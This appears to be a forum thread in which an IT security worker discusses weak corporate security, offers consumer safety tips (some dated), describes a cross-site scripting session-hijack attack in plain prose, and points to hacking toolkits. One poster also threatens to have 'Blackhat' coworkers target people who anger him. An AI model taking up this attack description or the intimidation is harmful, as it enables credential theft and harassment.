Jump to content

My life in IT Security - a review of 1500+ customer organizations


Akula

Recommended Posts

I have talked to less than 10 organizations that have good - focused, security teams.

 

I have talked to less than 2 banks that focus on security, and do it well.

 

Most of the IT Security people at organizations you actually do business with, have IT Security titles but are project managers.

 

I cannot unlearn how poorly security is treated, even after the Sony breach hit the market.

 

If you bank, use credit cards for anything, use any social networking, you will be losing your PII, I promise.

 

PII has about 15x the value of a single credit card number now, it isn't about credit cards anymore.

 

On the flip side, exploits are easier. BackTrack anyone?

Link to comment
Share on other sites

Off topic-ish, do know a guy named Bruce Schneier? He's a security guy that parlayed his experiences into other areas away from IT.

 

I know of him, read some of his stuff. I attend these little meetings like B-Sides and stuff at the HackerDojo with guys like Billy Rios or Ivan Ristic.

 

I am teaching classes again at Black Hat this year but even Black Hat has become a CIO road-show like RSA.

Link to comment
Share on other sites

Im in security. I agree, no one knows what the fuck they are doing. I do more sustainment of our security tools than analysis of useful data. Id like to get into writing signatures and checking out incidents.

 

Fuzzing is like Nascar, you only do it for the crashes.

 

We have 11000+ signatures, no point in reinventing the wheel.

 

Most of our R&D guys fuzz, write an exploit, publish to our KB, repeat. Seems kinda boring really.

Link to comment
Share on other sites

so i should withdraw all of my money and move to Australia?

 

Your money is safe-ish. I don't know about withdrawing it all, but you should avoid using your credit card at momNpop places.

 

You should never, EVER use the same password for facebook as you do for your bank.

 

Stop using tabbed browsing, in fact use more than one browser and use one for surfing and one for banking.

 

host files for credit cards, etrade and banks

 

log out for crying out loud, LOG OUT, don't just close the tab.

Link to comment
Share on other sites

Your money is safe-ish. I don't know about withdrawing it all, but you should avoid using your credit card at momNpop places.

 

You should never, EVER use the same password for facebook as you do for your bank.

 

Stop using tabbed browsing, in fact use more than one browser and use one for surfing and one for banking.

 

host files for credit cards, etrade and banks

 

log out for crying out loud, LOG OUT, don't just close the tab.

 

You mean like ie for pron, and firefox for paying for fleshlite?

 

p.s. serious question muddled by played internet humor.

Link to comment
Share on other sites

I would never use IE, but you get the idea. You never want to have your bank website up, and any other website up on the same browser or a session hijack can occur. then you need to LOG OUT of your bank's site.
Link to comment
Share on other sites

Wow, you're a geek.

 

Thanks.

 

I am also concerned with the bad things that happen out there. 350% increase in security incidents in the last year. Sony's pay service down for a month, seriously a freaking month!!!!?

 

It is so easy to exploit systems now that I don't think you even need to understand the underlying technology.

 

Attack and Defense Labs makes this great toy called Shell of the Future that should scare the crap out of everyone.

Link to comment
Share on other sites

I know absolutely NOTHING about IT stuff, so forgive me when I ask a dumb question like: Is it possible to track down the people that do this shit? They aught to hang them by the balls.

 

Yes, the ones that aren't good at it are easy to find. The good ones use open proxies to hide their identity.

Link to comment
Share on other sites

Note to self, never piss off Jason. He can fuck up your world.

 

Good info man.

 

Most of the guys I work with are Blackhats in some way, if you piss me off I just have them work on it. They are bored most days.

Link to comment
Share on other sites

 

Attack and Defense Labs makes this great toy called Shell of the Future that should scare the crap out of everyone.

 

I googled, read, did not understand. Can you give me cliffs in layman's terms?

Link to comment
Share on other sites

I googled, read, did not understand. Can you give me cliffs in layman's terms?

 

I put some malicious code on a web page, say on a forum that is allowing script tagging. Your browser executes the code and your computer pops up on my console I have running as a new target. I then copy your hard-drive to mine, or watch you log into your bank and capture the HTTP headers so I get your passwords, or what have you.

 

if you want some good "hacking" tools, go to http://www.getmantra.com/tools/ or just download Backtrack.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
×
  • Create New...